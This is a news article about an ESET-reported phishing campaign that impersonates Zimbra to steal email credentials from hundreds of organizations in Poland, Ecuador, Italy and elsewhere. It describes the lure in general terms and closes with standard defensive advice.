A widespread phishing campaign targeting customers of the Zimbra Collaboration software suite has become a notable concern as it continues to impact hundreds of organizations across multiple countries. Zimbra, known for its collaborative software suite that includes an email server and web client, has a smaller market share compared to traditional enterprise email solutions, according to industry statistics from Enlyft and 6sense.
Throughout the year, Zimbra has faced several security incidents. These include a remote code execution bug, a cross-site scripting zero-day, and an infostealing campaign orchestrated by North Korea. These incidents have raised alarms about the platform’s vulnerability to attacks and the potential risks faced by its users.
However, the latest phishing campaign has brought new challenges for Zimbra customers. ESET researchers have discovered that an unidentified threat actor has been conducting a scattershot phishing campaign since April 2023. The primary target of these attacks has been small-to-midsize businesses, which consist of Zimbra’s primary customer base. Surprisingly, government organizations have also fallen victim to this campaign.
Anton Cherepanov, ESET’s senior malware researcher, has revealed that “hundreds of different organizations were targeted by this campaign.” However, the extent of the damage caused remains uncertain due to the timely detection and prevention of most attacks.
The phishing attacks follow a general pattern. The threat actor impersonates Zimbra itself and sends out urgent phishing emails to users. The emails may claim to be related to a server update or account deactivation, aiming to create a sense of urgency and compel recipients to take immediate action. For instance, one of the phishing emails is titled “Important information from Zimbra Security Service” and provides instructions to download an attachment to prevent email account deactivation.
The attached HTML file redirects users to a seemingly legitimate Zimbra login page, where users are prompted to enter their credentials. Unbeknownst to the users, these credentials are then transmitted to the attackers. By obtaining such sensitive information, the attackers can potentially gain unauthorized access to Zimbra accounts, and in the worst-case scenario, even escalate their privileges to gain control over the entire server.
The impact of this campaign has been felt globally, with Poland being the most affected country, followed by Ecuador and Italy. Additionally, attacks have been reported in other countries such as Mexico, Kazakhstan, and the Netherlands. The affected organizations share a common thread—they all rely on Zimbra’s services.
To mitigate the risks associated with this phishing campaign, Cherepanov emphasizes the importance of adhering to standard security practices. Utilizing strong passwords, implementing multi-factor authentication, and ensuring the usage of the most up-to-date version of Zimbra are crucial steps to prevent compromise.
As Zimbra continues to grapple with security incidents and tackle the aftermath of this phishing campaign, it is crucial for users to remain vigilant and take proactive measures to protect themselves and their organizations from falling victim to such attacks. Heightened security awareness, regular software updates, and robust cybersecurity protocols are essential to safeguard against phishing attempts and maintain the integrity of sensitive information.